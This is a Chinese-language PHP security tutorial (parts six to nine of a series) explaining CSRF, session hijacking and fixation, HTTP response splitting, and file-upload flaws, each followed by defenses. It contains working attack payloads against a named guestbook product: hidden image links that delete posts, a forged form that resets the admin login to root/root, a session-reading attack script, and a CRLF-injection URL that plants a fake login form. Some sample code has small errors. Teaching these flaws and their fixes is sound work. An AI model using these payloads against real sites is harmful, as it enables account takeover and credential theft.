PHP 漏洞全解(六)-跨网站请求伪造
CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为 XSRF。攻击者伪造目标用户的 HTTP 请求,然后此请求发送到有 CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的 HTTP 连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的 HTTP 链接,从而达到攻击者的目的。
例如:某个购物网站购买商品时,采用 http://www.shop.com/buy.php?item=watch&num=1,
item 参数确定要购买什么物品,num 参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接<img src="http://www.shop.com/buy.php?item=watch&num=1000"/>,那么如果目标用户不小心访问以后,购买的数量就成了 1000 个
实例
随缘网络 PHP 留言板 V1.0
任意删除留言
//delbook.php 此页面用于删除留言
<?php
include_once("dlyz.php");
//dlyz.php 用户验证权限,当权限是 admin 的时候方可删除留言
include_once("../conn.php");
$del=$_GET["del"];
$id=$_GET["id"];
if ($del=="data"){
$ID_Dele= implode(",",$_POST['adid']);
$sql="delete from book where id in (".$ID_Dele.")";
mysql_query($sql);
}else{
$sql="delete from book where id=".$id; //传递要删除的留言 ID
mysql_query($sql);
}
mysql_close($conn);
echo "<script language='javascript'>";
echo "alert('删除成功!');";
echo " location='book.php';";
echo "</script>";
?>
当我们具有 admin 权限,提交 http://localhost/manage/delbook.php?id=2 时,就会删除id 为 2 的留言
利用方法:
我们使用普通用户留言(源代码方式),内容为
<img src="delbook.php?id=2" />
<img src="delbook.php?id=3" />
<img src="delbook.php?id=4" />
<img src="delbook.php?id=5" />
插入 4 张图片链接分别删除 4 个 id 留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了
现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的 ID 号的留言,全部都被删除。
攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了
修改管理员密码
//pass.php
if($_GET["act"]){
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>设计制作:<a href=http://www.115cn.cn>厦门随缘网络科技</a>";
$password=md5($_POST["password"]);
if(empty($_POST["password"])){
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}else{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language='javascript'>";
echo "alert('修改成功!');";
echo " location='pass.php';";
echo "</script>";
}
这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:
<body>
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
<input type="radio" value="1" name="sh">
<input type="radio" name="sh" checked value="0">
<input type="text" name="username" value="root">
<input type="password" name="password" value="root">
<input type="text" name="title" value="随缘网络 PHP 留言板 V1.0(带审核功能)" >
<textarea name="gg" rows="6" cols="80" >欢迎您安装使用随缘网络 PHP 留言板V1.0(带审核功能)!</textarea>
<textarea name="copyright" rows="6" cols="80" >随缘网络 PHP 留言本 V1.0版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制提供优惠主机域名
</textarea>
</form>
</body>
存为 attack.html,放到自己网站上 http://www.sectop.com/attack.html,此页面访问后会自动向目标程序的 pass.php 提交参数,用户名修改为 root,密码修改为 root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了 root
防范方法
防范 CSRF 要比防范其他攻击更加困难,因为 CSRF 的 HTTP 请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:
1、检查网页的来源
2、检查内置的隐藏变量
3、使用 POST,不要使用 GET
检查网页来源
在//pass.php 头部加入以下红色字体代码,验证数据提交
if($_GET["act"]){
if(isset($_SERVER["HTTP_REFERER"])){
$serverhost = $_SERVER["SERVER_NAME"];
$strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]);
$strdomain = explode("/",$strurl);
$sourcehost = $strdomain[0];
if(strncmp($sourcehost, $serverhost, strlen($serverhost))){
unset($_POST);
echo "<script language='javascript'>";
echo "alert('数据来源异常!');";
echo " location='index.php';";
echo "</script>";
}
}
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>设计制作:<a href=http://www.115cn.cn>厦门随缘网络科技</a>";
$password=md5($_POST["password"]);
if(empty($_POST["password"])){
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}else{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language='javascript'>";
echo "alert('修改成功!');";
echo " location='pass.php';";
echo "</script>";
}
检查内置隐藏变量
我们在表单中内置一个隐藏变量和一个 session 变量,然后检查这个隐藏变量和 session变量是否相等,以此来判断是否同一个网页所调用
<?php
include_once("dlyz.php");
include_once("../conn.php");
if($_GET["act"]){
if (!isset($_SESSION["post_id"])){
// 生成唯一的 ID,并使用 MD5 来加密
$post_id = md5(uniqid(rand(), true));
// 创建 Session 变量
$_SESSION["post_id"] = $post_id;
}
// 检查是否相等
if (isset($_SESSION["post_id"])){
// 不相等
if ($_SESSION["post_id"] != $_POST["post_id"]){
// 清除 POST 变量
unset($_POST);
echo "<script language='javascript'>";
echo "alert('数据来源异常!');";
echo " location='index.php';";
echo "</script>";
}
}
......
<input type="reset" name="Submit2" value="重置">
<input type="hidden" name="post_id" value="<?php echo $_SESSION["post_id"];?>">
</td></tr>
</table>
</form>
<?php
}
mysql_close($conn);
?>
</body>
</html>
使用 POST,不要使用 GET传递表单字段时,一定要是用 POST,不要使用 GET,处理变量也不要直接使用$_REQUEST
PHP 漏洞全解(七)-Session 劫持
服务端和客户端之间是通过 session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的 session。每个用户的 session 都是独立的,并且由服务器来维护。每个用户的 session 是由一个独特的字符串来识别,成为 session id。用户发出请求时,所发送的 http 表头内包含 session id 的值。服务器使用 http 表头内的 sessionid 来识别时哪个用户提交的请求。
session 保存的是每个用户的个人数据,一般的 web 应用程序会使用 session 来保存通过验证的用户账号和密码。在转换不同的网页时,如果需要验证用户身份,就是用 session内所保存的账号和密码来比较。session 的生命周期从用户连上服务器后开始,在用户关掉浏览器或是注销时用户 session_destroy 函数删除 session 数据时结束。如果用户在 20 分钟内没有使用计算机的动作,session 也会自动结束。
php 处理 session 的应用架构
会话劫持
会话劫持是指攻击者利用各种手段来获取目标用户的 session id。一旦获取到 session id,
那么攻击者可以利用目标用户的身份来登录网站,获取目标用户的操作权限。
攻击者获取目标用户 session id 的方法:
1)暴力破解:尝试各种 session id,直到破解为止。
2)计算:如果 session id 使用非随机的方式产生,那么就有可能计算出来
3)窃取:使用网络截获,xss 攻击等方法获得
会话劫持的攻击步骤
实例
//login.php
<?php
session_start();
if (isset($_POST["login"])){
$link = mysql_connect("localhost", "root", "root") or die("无法建立 MySQL 数据库连接:" . mysql_error());
mysql_select_db("cms") or die("无法选择 MySQL 数据库");
if(!get_magic_quotes_gpc()){
$query ="select * from member where username='".addslashes($_POST["username"])."' and password='" . addslashes($_POST["password"]) . "'";
}else{
$query = "select * from member where username='".$_POST["username"]."' and password='" . $_POST["password"] . "'";
}
$result = mysql_query($query) or die("执行 MySQL 查询语句失败:" . mysql_error());
$match_count = mysql_num_rows($result);
if ($match_count){
$_SESSION["username"] = $_POST["username"];
$_SESSION["password"] = $_POST["password"];
$_SESSION["book"] = 1;
mysql_free_result($result);
mysql_close($link);
header("Location: http://localhost/index.php?user=" .
$_POST["username"]);
}
.....
//index.php
<?php
// 打开 Session
session_start();
<p>
访客的 Session ID 是:<?php echo session_id(); ?>
</p>
<p>
访客:<?php echo htmlspecialchars($_GET["user"], ENT_QUOTES); ?>
</p>
<p>
book 商品的数量:<?php echo htmlspecialchars($_SESSION["book"], ENT_QUOTES); ?>
如果登录成功,使用
$_SESSION["username"] 保存账号
$_SESSION["password"] 保存密码
#_SESSION["book"] 保存购买商品数目
登录以后显示
开始攻击
//attack.php
<?php
// 打开 Session
session_start();
echo "目标用户的 Session ID 是:" . session_id() . "<br />";
echo "目标用户的 username 是:" . $_SESSION["username"] . "<br />";
echo "目标用户的 password 是:" . $_SESSION["password"] . "<br />";
// 将 book 的数量设置为 2000
$_SESSION["book"] = 2000;
?>
提交 http://localhost/attack.php?PHPSESSID=5a6kqe7cufhstuhcmhgr9nsg45 此 ID 为获取到的客户 session id,刷新客户页面以后客户购买的商品变成了 2000
session 固定攻击
黑客可以使用把 session id 发给用户的方式,来完成攻击
http://localhost/index.php?user=dodo&PHPSESSID=1234 把此链接发送给 dodo 这个用户显示
然后攻击者再访问 http://localhost/attack.php?PHPSESSID=1234 后,客户页面刷新,发现商品数量已经成了 2000
防范方法
1)定期更改 session id
函数 bool session_regenerate_id([bool delete_old_session])
delete_old_session 为 true,则删除旧的 session 文件;为 false,则保留旧的session,默认 false,可选
在 index.php 开头加上
<?php
session_start();
session_regenerate_id(TRUE);
......
这样每次从新加载都会产生一个新的 session id
2)更改 session 的名称
session 的默认名称是 PHPSESSID,此变量会保存在 cookie 中,如果黑客不抓包分析,就不能猜到这个名称,阻挡部分攻击
<?php
session_start();
session_name("mysessionid");
......
3)关闭透明化 session id
透明化 session id 指当浏览器中的 http 请求没有使用 cookies 来制定 session id 时,
sessioin id 使用链接来传递;打开 php.ini,编辑
session.use_trans_sid = 0
代码中
<?php
int_set("session.use_trans_sid", 0);
session_start();
......
4)只从 cookie 检查 session id
session.use_cookies = 1 表示使用 cookies 存放 session id
session.use_only_cookies = 1 表示只使用 cookies 存放 session id,这可以避免 session
固定攻击代码中
int_set("session.use_cookies", 1);
int_set("session.use_only_cookies", 1);
5)使用 URL 传递隐藏参数
<?php
session_start();
$seid = md5(uniqid(rand()), TRUE));
$_SESSION["seid"] = $seid;
攻击者虽然能获取 session 数据,但是无法得知$seid 的值,只要检查 seid 的值,就可以
确认当前页面是否是 web 程序自己调用的。
HTTP 请求的格式
1)请求信息:例如“Get /index.php HTTP/1.1”,请求 index.php 文件
2)表头:例如“Host: localhost”,表示服务器地址
3)空白行
4)信息正文
“请求信息”和“表头”都必须使用换行字符(CRLF)来结尾,空白行只能包含换行符,不
可以有其他空格符。
下面例子发送 HTTP 请求给服务器 www.yhsafe.com
GET /index.php HTTP/1.1↙
//请求信息
Host:www.yhsafe.com↙
//表头
↙
//空格行
↙
↙符号表示回车键,在空白行之后还要在按一个空格才会发送 HTTP 请求,HTTP 请求的表头中只有 Host 表头是必要的饿,其余的 HTTP 表头则是根据 HTTP 请求的内容而定。
HTTP 请求的方法
1)GET:请求响应
2)HEAD:与 GET 相同的响应,只要求响应表头
3)POST:发送数据给服务器处理,数据包含在 HTTP 信息正文中
4)PUT:上传文件
5)DELETE:删除文件
6)TRACE:追踪收到的请求
7)OPTIONS:返回服务器所支持的 HTTP 请求的方法
8)CONNECT:将 HTTP 请求的连接转换成透明的 TCP/IP 通道
PHP 漏洞全解(八)-HTTP 响应拆分
HTTP 响应的格式
服务器在处理完客户端所提出的 HTTP 请求后,会发送下列响应。
1)第一行是状态码
2)第二行开始是其他信息
状态码包含一个标识状态的数字和一个描述状态的单词。例如:
HTTP/1.1 200 OK
是标识状态的是数字,OK 则是描述状态的单词,这个状态码标识请求成功。
HTTP 请求和响应的例子
打开 cmd 输入 telnet,输入 open www.00aq.com 80
打开连接后输入
GET /index.php HTTP/1.1↙
Host:www.00aq.com↙
↙
↙
返回 HTTP 响应的表头
返回的首页内容
使用 PHP 来发送 HTTP 请求
header 函数可以用来发送 HTTP 请求和响应的表头
函数原型
void header(string string [, bool replace [, int http_response_code]])
string 是 HTTP 表头的字符串
如果 replace 为 TRUE,表示要用目前的表头替换之前相似的表头;如果 replace为 FALSE,表示要使用多个相似的表头,默认值为 TRUE
http_response_code 用来强制 HTTP 响应码使用 http_response_code 的值
实例:
<?php
// 打开 Internet socket 连接
$fp = fsockopen(www.00aq.com, 80);
// 写入 HTTP 请求表头
fputs($fp, "GET / HTTP/1.1\r\n");
fputs($fp, "Host: www.00aq.com\r\n\r\n");
// HTTP 响应的字符串
$http_response = "";
while (!feof($fp)){
// 读取 256 位的 HTTP 响应字符串
$http_response .= fgets($fp, );
}
// 关闭 Internet socket 连接
fclose($fp);
// 显示 HTTP 响应信息
echo nl2br(htmlentities($http_response));
?>
HTTP 响应拆分攻击
HTTP 响应拆分是由于攻击者经过精心设计利用电子邮件或者链接,让目标用户利用一个请求产生两个响应,前一个响应是服务器的响应,而后一个则是攻击者设计的响应。此攻击之所以会发生,是因为 WEB 程序将使用者的数据置于 HTTP 响应表头中,这些使用者的数据是有攻击者精心设计的。
可能遭受 HTTP 请求响应拆分的函数包括以下几个:
header();
setcookie();
session_id();
setrawcookie();
HTTP 响应拆分通常发生在:
Location 表头:将使用者的数据写入重定向的 URL 地址内
Set-Cookie 表头:将使用者的数据写入 cookies 内
实例:
<?php
header("Location: " . $_GET['page']);
?>
请求
GET /location.php?page=http://www.00aq.com HTTP/1.1↙
Host: localhost↙
↙
返回
HTTP/1.1 302 Found
Date: Wed, 13 Jan 2010 03:44:24 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Location: http://www.00aq.com
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
访问下面的链接,会直接出现一个登陆窗口
http://localhost/location.php?page=%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.
1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%20158%0d%0a%0d
%0a<html><body><form%20method=post%20name=form1>帐号%20<input%20type=text%20name=username%20/><br%20/>密码%20<input%20name=password%20type=password%20/><br%20/><input%20type=submit%20name=login%20value=登录%20/></form></body></html>
转换成可读字符串为:
Content-Type: text/html
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 158
<html><body><form method=post name=form1> 帐 号 <input type=text name=username/><br /> 密 码<input name=password type=password /><br /><input type=submit name=login value=登录 /></form></body></html>
一个 HTTP 请求产生了两个响应
防范的方法:
1)替换 CRLF 换行字符
<?php
header("Location: " . strtr($_GET['page'], array("\r"=>"", "\n"=>"")));
?>
2)使用最新版本的 PHP
PHP 最新版中,已经不允许在 HTTP 表头内出现换行字符
隐藏 HTTP 响应表头
apache 中 httpd.conf,选项 ServerTokens = Prod, ServerSignature = Off
php 中 php.ini,选项 expose_php = Off
PHP 漏洞全解(九)-文件上传漏洞
一套 web 应用程序,一般都会提供文件上传的功能,方便来访者上传一些文件。
文件上传漏洞
如果提供给网站访问者上传图片的功能,那必须小心访问者上传的实际可能不是图片,而是可以指定的 PHP 程序。如果存放图片的目录是一个开放的文件夹,则入侵者就可以远程执行上传的 PHP 文件来进行攻击。